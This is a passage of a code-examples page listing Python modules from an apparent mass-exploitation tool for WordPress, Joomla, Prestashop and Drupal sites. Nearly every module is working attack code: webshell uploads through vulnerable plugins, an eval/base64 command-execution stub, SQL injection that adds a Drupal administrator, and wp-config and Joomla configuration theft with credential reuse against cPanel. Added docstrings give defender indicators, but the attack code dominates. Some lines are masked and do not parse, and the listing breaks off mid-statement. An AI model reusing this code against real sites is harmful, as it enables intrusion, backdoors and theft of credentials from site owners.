예제 #1
def Exploit(site):
    """Upload-and-verify module labelled 'addblockblocker' (WordPress).

    Sends a local file as multipart field 'popimg' to
    /wp-admin/admin-ajax.php?action=getcountryuser&cs=2, requests the dated
    /wp-content/uploads/20YY/MM/<filename> path, then looks for the literal
    marker 'Vuln!!' at /wp-content/vuln.php and /vuln.htm.

    Defender notes: in access logs this shows up as an unauthenticated
    multipart POST to admin-ajax.php with action=getcountryuser, followed by
    GETs for a .php file under wp-content/uploads and for vuln.php / vuln.htm.
    Denying script execution under wp-content/uploads and removing or
    updating the affected plugin closes this path; file-integrity monitoring
    on wp-content catches the dropped files.

    pagelinesExploitShell, year, month, Headers and printModule are
    module-level names defined outside this listing.
    """
    try:
        ShellFile = {'popimg': open(pagelinesExploitShell, 'rb')}
        Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
        requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
        # Expected landing path of the upload: uploads/<year>/<month>/<basename>.
        CheckShell = 'http://' + site + '/wp-content/uploads/20' + year + '/' + month + '/' \
                     + pagelinesExploitShell.split('/')[1]
        GoT = requests.get(CheckShell, timeout=10, headers=Headers)
        if GoT.status_code == 200:
            # Marker files checked after the uploaded file has been requested.
            CheckShell = requests.get('http://' + site +
                                      '/wp-content/vuln.php',
                                      timeout=10,
                                      headers=Headers)
            CheckIndex = requests.get('http://' + site + '/vuln.htm',
                                      timeout=10,
                                      headers=Headers)
            if 'Vuln!!' in CheckShell.content:
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(site + '/wp-content/vuln.php' + '\n')
                if 'Vuln!!' in CheckIndex.content:
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/vuln.htm' + '\n')
                return printModule.returnYes(site, 'N/A', 'addblockblocker',
                                             'Wordpress')
            else:
                return printModule.returnNo(site, 'N/A', 'addblockblocker',
                                            'Wordpress')
        else:
            return printModule.returnNo(site, 'N/A', 'addblockblocker',
                                        'Wordpress')
    except:
        # Any exception (network, file, type) is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'addblockblocker',
                                    'Wordpress')
예제 #2
def Exploit(site):
    """Upload-and-verify module labelled 'Com_b2jcontact' (Joomla).

    POSTs `payloadshell` to the com_b2jcontact uploader with a `qqfile`
    value containing `/../../../` path segments, then checks
    /components/com_b2jcontact/vuln.php for the literal marker 'Vuln!!'.

    Defender notes: the request is identifiable by option=com_b2jcontact,
    type=uploader and a qqfile parameter containing '../'. Rejecting path
    separators in upload file names, updating or removing the component, and
    alerting on new .php files under /components/ address this path.

    payloadshell, Headers, getSMTP and printModule are defined outside this
    listing; what getSMTP.JooomlaSMTPshell does is not visible here.
    """
    try:
        requests.post(
            'http://' + site +
            '/index.php?option=com_b2jcontact&view=loader&type=uploader&'
            'owner=component&bid=1&qqfile=/../../../vuln.php',
            data=payloadshell,
            timeout=10,
            headers=Headers)
        CheckSh = requests.get('http://' + site +
                               '/components/com_b2jcontact/vuln.php',
                               timeout=10,
                               headers=Headers)

        if 'Vuln!!' in str(CheckSh.content):
            # The logged URL carries a ?cmd= query string, i.e. the dropped
            # file is treated as a command-execution endpoint.
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(
                    site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' +
                    '\n')
            getSMTP.JooomlaSMTPshell(
                site + '/components/com_b2jcontact/vuln.php?cmd=id')
            return printModule.returnYes(site, 'N/A', 'Com_b2jcontact',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_b2jcontact',
                                        'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def exploit(url):
    """Module labelled 'Joomla 3.x Rce' and tagged CVE-2015-8562.

    Sends a crafted request to /index.php/component/users through helpers
    defined elsewhere (make_req, get_backdoor_pay, ping_backdoor,
    execute_backdoor), then uses them to write two files into the web root:
    vuln.htm (marker only) and vuln.php (marker plus an eval/base64_decode
    stub that the tool later calls with a `cmd` query parameter).

    Defender notes: artefacts are /vuln.htm and /vuln.php in the document
    root containing the string 'Vuln!!', and PHP files in the web root
    combining eval with base64_decode. Upgrading Joomla to a release that
    fixes CVE-2015-8562, and alerting on new PHP files in the web root, are
    the relevant controls. How the initial request is built is not visible
    in this listing.
    """
    try:
        target_url = url + '/index.php/component/users'
        make_req(target_url, get_backdoor_pay())
        if ping_backdoor(url, backdoor_param):
            execute_backdoor(
                url, 'system(\'echo "Vuln!!" > vuln.htm\');')  # cmd=commend
            execute_backdoor(
                url,
                'system(\'echo "Vuln!!<?php {}(base64_decode("{}")); ?>" > vuln.php\');'
                .format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7'))
            # Verification: both dropped files are fetched and checked for
            # the marker string.
            CheckShell = requests.get('http://' + url + '/vuln.php',
                                      headers=Headers,
                                      timeout=10)
            checkIndex = requests.get('http://' + url + '/vuln.htm',
                                      headers=Headers,
                                      timeout=10)
            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(url + '/vuln.php?cmd=id' + '\n')
                getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id')
            if 'Vuln!!' in str(checkIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(url + '/vuln.htm\n')
            return printModule.returnYes(url, 'CVE-2015-8562',
                                         'Joomla 3.x Rce', 'Joomla')

        else:
            return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
                                        'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
                                    'Joomla')
def Exploit(site):
    """Upload-and-verify module labelled 'attributewizardpro_x Module' (Prestashop).

    POSTs a GIF and then a second file as multipart field 'userfile' to
    /modules/attributewizardpro_x/file_upload.php. The stored file name is
    taken from the part of the response before '|||', and the file is then
    fetched from /modules/attributewizardpro_x/file_uploads/.

    Defender notes: look for unauthenticated POSTs to file_upload.php in this
    module followed by GETs under file_uploads/, and for non-image files in
    that directory. Removing or updating the module and denying script
    execution in file_uploads/ address this path.

    Jce_Deface_image, ShellPresta, Headers and printModule are defined
    outside this listing.
    """
    try:
        Exp = site + '/modules/attributewizardpro_x/file_upload.php'
        FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
        FileDataShell = {'userfile': open(ShellPresta, 'rb')}
        GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
        if Jce_Deface_image.split('/')[1] in GoT.content:
            # Server-assigned name is the first '|||'-separated field.
            Index = GoT.content.split('|||')[0]
            IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
            CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers)
            # 'GIF89a' is the GIF header, used here as proof the upload is served back.
            if 'GIF89a' in CheckIndex.content:
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers)
                if ShellPresta.split('/')[1] in GoT.content:
                    Shell = Got2.content.split('|||')[0]
                    ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
                    CheckShell = requests.get('http://' + ShellPath, timeout=5, headers=Headers)
                    if 'Vuln!!' in CheckShell.content:
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                return printModule.returnYes(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
예제 #5
def Exploit(site):
    """Module labelled 'Drupal7 Add Admin' and tagged CVE-2014-3704.

    Submits the user_login_block form with a `name[...]` array key that
    carries stacked SQL statements: an INSERT into `users` and an INSERT
    into `users_roles` with rid 3. Success is inferred from the PHP warning
    text "mb_strlen() expects parameter 1" in the response.

    Defender notes: indicators are POSTs to /?q=node&destination=node whose
    body has `name[` keys containing SQL keywords, the mb_strlen() warning in
    responses or PHP logs, and unexpected rows in `users` / `users_roles`.
    Upgrading to a Drupal 7 release that fixes CVE-2014-3704 removes the
    injection point. Accounts created this way persist after patching, so
    the user and role tables need an audit as well.

    The user, password and pass values are masked ('******') in this listing.
    """
    user = '******'
    password = '******'
    # Pre-computed Drupal 7 ($S$) password hash, truncated to 55 characters.
    Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55]

    # The first dictionary key is the injection vector: the SQL lives in the
    # array index of the `name` form field, not in a value.
    POSTDATA = {
        'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,'
        '+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_'
        'roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+'
        '%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]',
        'name[0]': 'test',
        'pass': '******',
        'test2': 'test',
        'form_build_id': '',
        'form_id': 'user_login_block',
        'op': 'Log+in'
    }
    agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
    try:
        resp = requests.post('http://' + site + '/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent)
        if "mb_strlen() expects parameter 1" in str(resp.content):
            with open('result/AdminTakeover_results.txt', 'a') as writer:
                writer.write(site + '/user/login\n  Username: {}\n'
                                    '  Password: {}\n------------------------------------------\n'
                             .format(user, password))
            return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
        else:
            return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
def Exploit(site):
    """Upload-and-verify module labelled 'Downloads-Manager', tagged CVE-2008-3362 (WordPress).

    Fingerprints the plugin by fetching
    /wp-content/plugins/downloads-manager/img/unlock.gif, then POSTs to the
    site root with form field `dm_upload` and multipart field `upfile`.
    Uploaded files are fetched from
    /wp-content/plugins/downloads-manager/upload/.

    Defender notes: look for POSTs to '/' carrying dm_upload/upfile, GETs
    for unlock.gif shortly before them, and non-archive files (notably .php)
    in the plugin's upload/ directory. Removing the plugin or denying script
    execution in upload/ addresses this path.

    Jce_Deface_image, pagelinesExploitShell, Headers and printModule are
    defined outside this listing.
    """
    try:
        Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif',
                                 timeout=10, headers=Headers)
        # 'GIF89a' (GIF header) in the response is taken as "plugin present".
        if 'GIF89a' in str(Checkvuln.content):
            PostDAta = {'dm_upload': ''}
            fileDeface = {'upfile': open(Jce_Deface_image, 'rb')}
            fileShell = {'upfile': open(pagelinesExploitShell, 'rb')}
            requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=10, headers=Headers)
            CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
                                      Jce_Deface_image.split('/')[1])
            if 'GIF89a' in str(CheckIndex.content):
                requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=10, headers=Headers)
                requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
                             pagelinesExploitShell.split('/')[1], timeout=10, headers=Headers)
                CheckShell = requests.get('http://' + site + '/wp-content/vuln.php',
                                          timeout=10, headers=Headers)
                if 'Vuln!!' in str(CheckShell.content):
                    with open('result/Shell_results.txt', 'a') as writer:
                        writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
                                     pagelinesExploitShell.split('/')[1] + '\n')
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/vuln.htm' + '\n')
                    return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
                else:
                    # Only the image upload was confirmed; still reported as a hit.
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
                                     Jce_Deface_image.split('/')[1] + '\n')
                    return printModule.returnYes(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
            else:
                return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'CVE-2008-3362', 'Downloads-Manager', 'Wordpress')
예제 #7
def Exploit(site):
    """Upload-and-verify module labelled 'fieldvmegamenu Module' (Prestashop).

    Probes /modules/fieldvmegamenu/ajax/upload.php for HTTP 200, then POSTs
    files as multipart field 'images[]' and fetches them back from
    /modules/fieldvmegamenu/uploads/ under their original base names.

    Defender notes: look for unauthenticated POSTs to ajax/upload.php in
    this module and for non-image files in its uploads/ directory. Removing
    or updating the module and denying script execution in uploads/ address
    this path.

    Jce_Deface_image, ShellPresta, Headers and printModule are defined
    outside this listing.
    """
    Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
    try:
        Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
        if Checkvuln.status_code == 200:
            FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')}
            FileDataShell = {'images[]': open(ShellPresta, 'rb')}
            # File names are preserved by the endpoint, so the retrieval
            # paths are predictable from the local base names.
            uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + Jce_Deface_image.split('/')[1]
            uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + ShellPresta.split('/')[1]
            requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers)
            CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
            if 'GIF89a' in CheckIndex.content:
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(uploadedPathIndex + '\n')
                requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers)
                Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
                if 'Vuln!!' in Checkshell.content:
                    with open('result/Shell_results.txt', 'a') as writer:
                        writer.write(uploadedPathShell + '\n')
                return printModule.returnYes(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
예제 #8
def Exploit(site):
    """Upload-and-verify module labelled 'Com_rokdownloads' (Joomla).

    Probes /administrator/components/com_rokdownloads/assets/uploadhandler.php
    (HTTP 200 or 500 counts as present), then POSTs files as multipart field
    'files[]' with form field jpath='../../../../' and looks for the result
    under /images/stories/.

    Defender notes: look for POSTs to uploadhandler.php with a `jpath`
    value containing '../', and for .php files under /images/stories/.
    Removing or updating the component, blocking direct access to
    /administrator/components/ from unauthenticated clients, and denying
    script execution under /images/ address this path.

    Jce_Deface_image, ShellPresta, Headers and printModule are defined
    outside this listing.
    """
    try:
        Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
                             timeout=10, headers=Headers)
        if Check.status_code == 200 or Check.status_code == 500:
            IndeX = {'files[]': open(Jce_Deface_image, 'rb')}

            ShellFile = {'files[]': open(ShellPresta, 'rb')}
            # Caller-supplied destination path with parent-directory segments.
            Datapost = {'jpath': '../../../../'}
            requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
                          files=ShellFile, data=Datapost, timeout=10, headers=Headers)
            CheckShell = requests.get('http://' + site +
                                      '/images/stories/up.php', timeout=10, headers=Headers)

            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(site + '/images/stories/up.php\n')
                return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
            else:
                # Fallback: try the image upload alone.
                requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
                              files=IndeX, data=Datapost, timeout=10, headers=Headers)

                CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1],
                                          headers=Headers, timeout=10)
                if 'GIF89a' in str(CheckIndex.content):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n')
                    return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
                else:
                    return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
def Exploit(site):
    """Upload-and-verify module labelled 'mod_simplefileuploadv Module' (Joomla).

    POSTs the local file files/up.php as multipart field 'file' to
    /modules/mod_simplefileuploadv1.3/elements/udd.php and then checks
    /modules/mod_simplefileuploadv1.3/elements/up.php for the marker
    'Vuln!!'.

    Defender notes: look for POSTs to elements/udd.php in this module and
    for files other than the module's own in elements/. Removing or updating
    the module and alerting on new .php files under /modules/ address this
    path.

    Headers and printModule are defined outside this listing.
    """
    try:
        PostFile = {'file': open('files/up.php', 'rb')}
        requests.post('http://' + site +
                      '/modules/mod_simplefileuploadv1.3/elements/udd.php',
                      files=PostFile,
                      timeout=10,
                      headers=Headers)
        CheckShell = requests.get(
            'http://' + site +
            '/modules/mod_simplefileuploadv1.3/elements/up.php',
            timeout=10,
            headers=Headers)
        if 'Vuln!!' in str(CheckShell.content):
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(
                    site +
                    '/modules/mod_simplefileuploadv1.3/elements/up.php' + '\n')
            return printModule.returnYes(site, 'N/A',
                                         'mod_simplefileuploadv Module',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A',
                                        'mod_simplefileuploadv Module',
                                        'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A',
                                    'mod_simplefileuploadv Module', 'Joomla')
예제 #10
def Exploit(site):
    """Module labelled 'Revslider Config' and tagged CVE-2015-1579 (WordPress).

    Requests admin-ajax.php with action=revslider_show_image and
    img=../wp-config.php. If the response contains 'DB_PASSWORD', the
    DB_HOST / DB_USER / DB_PASSWORD / DB_NAME values are extracted with
    regexes and written to a results file. The recovered user and password
    are also passed to cpanel.Check, which is defined elsewhere and
    presumably tests them against another service (credential reuse).

    Defender notes: indicators are GETs to admin-ajax.php with
    action=revslider_show_image and an `img` value containing '../' or
    naming a .php file. If such a request returned the config, the database
    credentials and the wp-config.php keys/salts are disclosed and need
    rotation, along with any other account sharing that password. Updating
    the slider plugin to a release that fixes CVE-2015-1579 removes the
    file-read.

    Attack, cpanel, Headers and printModule are defined outside this listing.
    """
    try:
        Exp = 'http://' + site + \
              '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
        GetConfig = requests.get(Exp, timeout=10, headers=Headers)
        if 'DB_PASSWORD' in str(GetConfig.content):
            Attack(site)
            with open('result/Config_results.txt', 'a') as ww:
                ww.write('Full Config Path  : ' + Exp + '\n')
            try:
                #define('DB_USER', 'admin_soljica2');
                Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content))
                Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content))
                Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content))
                Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content))
                cpanel.Check(site, Getuser[0], Getpass[0])

                # NOTE: the user/pass operands in the write() below were masked
                # ('******') by the page this listing came from, so the
                # statement does not parse as shown.
                with open('result/Config_results.txt', 'a') as ww:
                    ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + Getdb[
                                 0] + '\n---------------------\n')
                return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
            except:
                # Parsing failed, but the config was still readable: reported as a hit.
                return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
예제 #11
def Exploit(site):
    """Config-disclosure module labelled 'Com_s5_media_player' (Joomla).

    Requests /plugins/content/s5_media_player/helper.php with a
    base64-encoded `fileurl` value. A response containing 'JConfig' is
    treated as the site's configuration file, from which host, user,
    password and db values are extracted with regexes and written to a
    results file. The raw config is also passed to getSMTP.GETSmtpJoomConf
    (defined elsewhere; presumably extracts mail settings).

    Defender notes: indicators are GETs to helper.php in this plugin with a
    `fileurl` parameter; decode the base64 value in logs to see which file
    was requested. If the config was returned, database and mail credentials
    and the Joomla secret need rotation. Removing or updating the plugin
    closes the file-read.

    Headers, getSMTP and printModule are defined outside this listing.
    """
    try:
        Exp = 'http://' + site + \
              '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
        GetConfig = requests.get(Exp, timeout=10, headers=Headers)
        if 'JConfig' in str(GetConfig.content):
            with open('result/Config_results.txt', 'a') as ww:
                ww.write('Full Config Path  : ' + Exp + '\n')
            try:
                # NOTE: the user/password patterns and the write() operands
                # below were masked ('******') by the page this listing came
                # from; the write() statement does not parse as shown.
                Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
                Getuser = re.findall("user = '******';", str(GetConfig.content))
                Getpass = re.findall("password = '******';",
                                     str(GetConfig.content))
                Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
                with open('result/Config_results.txt', 'a') as ww:
                    ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + Getdb[0] +
                             '\n---------------------\n')
                getSMTP.GETSmtpJoomConf(str(GetConfig.content))
            except:
                # Parsing failed, but the config was still readable: reported as a hit.
                return printModule.returnYes(site, 'N/A',
                                             'Com_s5_media_player', 'Joomla')
            return printModule.returnYes(site, 'N/A', 'Com_s5_media_player',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
                                        'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
                                    'Joomla')
예제 #12
def Exploit(site):
    """Upload-and-verify module labelled 'Com_redmystic' (Joomla).

    POSTs `payloadshell` as the raw request body to the bundled
    ofc_upload_image.php with name=vuln.php, then checks
    .../chart/tmp-upload-images/vuln.php for the marker 'Vuln!!'. On a hit
    it calls getSMTP.JooomlaSMTPshell and wsoShellUploaderModule.UploadWso
    (both defined elsewhere) and records the latter's result unless it is
    the string 'No'.

    Defender notes: indicators are POSTs to any ofc_upload_image.php with a
    `name` ending in .php, and .php files in a tmp-upload-images directory.
    The endpoint is a bundled charting-library sample script; deleting
    ofc_upload_image.php and the tmp-upload-images directory, or updating
    the component, removes the upload path.

    payloadshell, Headers and printModule are defined outside this listing.
    """
    try:
        requests.post('http://' + site + '/administrator/components/com_redmystic/chart/'
                                         'ofc-library/ofc_upload_image.php?name=vuln.php',
                      data=payloadshell, headers=Headers, timeout=10)
        Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/'
                                              'chart/tmp-upload-images/vuln.php',
                           headers=Headers, timeout=10)
        if 'Vuln!!' in str(Exp.content):
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(site + '/administrator/components/com_redmystic/chart/'
                                    'tmp-upload-images/vuln.php?cmd=uname -a' + '\n')
            getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/'
                                            'tmp-upload-images/vuln.php?cmd=id')
            # Second-stage step: the return value is either 'No' or something
            # that gets logged to WSo_Shell.txt.
            WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/'
                                                          'tmp-upload-images/vuln.php?cmd=id')
            if WSo == 'No':
                pass
            else:
                with open('result/WSo_Shell.txt', 'a') as Wr:
                    Wr.write('{}\n'.format(WSo))

            return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
예제 #13
def Exploit(site):
    """Upload-and-verify module labelled 'Com_Media' (Joomla).

    Fetches the com_media image-picker view without logging in. If the page
    exposes an upload form ('task=file.upload'), the form's action URL is
    extracted and a text file is POSTed to it as multipart field
    'Filedata[]'; /images/vuln.txt is then checked for 'Vuln!!'.

    Defender notes: the precondition is that the media manager's upload
    form is reachable by anonymous sessions. Restricting com_media
    permissions to authenticated groups removes it. Indicators are
    anonymous requests to option=com_media&view=images followed by a
    task=file.upload POST, and /images/vuln.txt on disk.

    TextindeX and printModule are defined outside this listing.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0'}
    # A session is used so cookies from the GET accompany the upload POST.
    sess = requests.session()
    try:
        GET = sess.get('http://' + site + '/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name='
                                          'jform_articletext&asset=com_content&author=&folder=',
                       timeout=10, headers=headers)
        if 'task=file.upload' in str(GET.content):
            try:
                Uploader = re.findall('action="(.*)" id="uploadForm"', str(GET.content))[0]
                # Strip the scheme; 'http://' is re-added when posting.
                if Uploader.startswith("http://"):
                    Uploader = Uploader.replace("http://", "")
                elif Uploader.startswith("https://"):
                    Uploader = Uploader.replace("https://", "")
                else:
                    pass
                POSTDATA = {'Filedata[]': open(TextindeX, 'rb')}
                sess.post('http://' + Uploader, files=POSTDATA, headers=headers, timeout=10)
                CheckIndex = requests.get('http://' + site + '/images/vuln.txt', timeout=10,
                                          headers=headers).content
                if 'Vuln!!' in str(CheckIndex):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/images/vuln.txt\n')
                    return printModule.returnYes(site, 'N/A', 'Com_Media', 'Joomla')
                else:
                    return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
            except:
                return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
예제 #14
def Exploit(site):
    """Upload-and-verify module labelled 'Com_MyBlog' (Joomla).

    POSTs a GIF as multipart field 'fileToUpload' to
    /index.php?option=com_myblog&task=ajaxupload, works out where the file
    landed (either /images/pwn.gif or the `source: '...'` value in the
    response) and fetches it, using the GIF header 'GIF89a' as confirmation.

    Defender notes: indicators are unauthenticated POSTs with
    option=com_myblog&task=ajaxupload and unexpected files under /images/.
    Updating or removing the component and requiring an authenticated
    session for the upload task address this path.

    Jce_Deface_image, Headers and printModule are defined outside this
    listing.
    """
    try:
        fileindex = {'fileToUpload': open(Jce_Deface_image, 'rb')}
        Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
        GoT = requests.post(Exp, files=fileindex, timeout=10, headers=Headers)
        if 'success' or 'File exists' in str(GoT.content):
            if '/images/pwn' in str(GoT.content):
                IndeXpath = 'http://' + site + '/images/pwn.gif'
            else:
                try:
                    GetPAth = re.findall("source: '(.*)'", str(GoT.content))
                    IndeXpath = GetPAth[0]
                except:
                    # No `source:` field in the response: fall back to the default path.
                    IndeXpath = 'http://' + site + '/images/pwn.gif'
            CheckIndex = requests.get(IndeXpath, timeout=10, headers=Headers)
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndeXpath + '\n')
                return printModule.returnYes(site, 'N/A', 'Com_MyBlog',
                                             'Joomla')
            else:
                return printModule.returnNo(site, 'N/A', 'Com_MyBlog',
                                            'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
예제 #15
def Exploit(site):
    """Upload-and-verify module labelled 'Com_civicrm' (Joomla).

    POSTs `payloadshell` as the raw request body to the OpenFlashChart
    ofc_upload_image.php bundled under com_civicrm with name=vuln.php, then
    checks .../OpenFlashChart/tmp-upload-images/vuln.php for the marker
    'Vuln!!'.

    Defender notes: indicators are POSTs to any ofc_upload_image.php with a
    `name` ending in .php, and .php files in a tmp-upload-images directory.
    The endpoint is a bundled charting-library sample script; deleting it
    and the tmp-upload-images directory, or updating the component, removes
    the upload path.

    payloadshell, Headers, getSMTP and printModule are defined outside this
    listing; what getSMTP.JooomlaSMTPshell does is not visible here.
    """
    try:
        requests.post(
            'http://' + site +
            '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
            'php-ofc-library/ofc_upload_image.php?name=vuln.php',
            data=payloadshell,
            headers=Headers,
            timeout=10)
        Exp = requests.get(
            'http://' + site +
            '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
            'tmp-upload-images/vuln.php',
            headers=Headers,
            timeout=10)
        if 'Vuln!!' in str(Exp.content):
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(
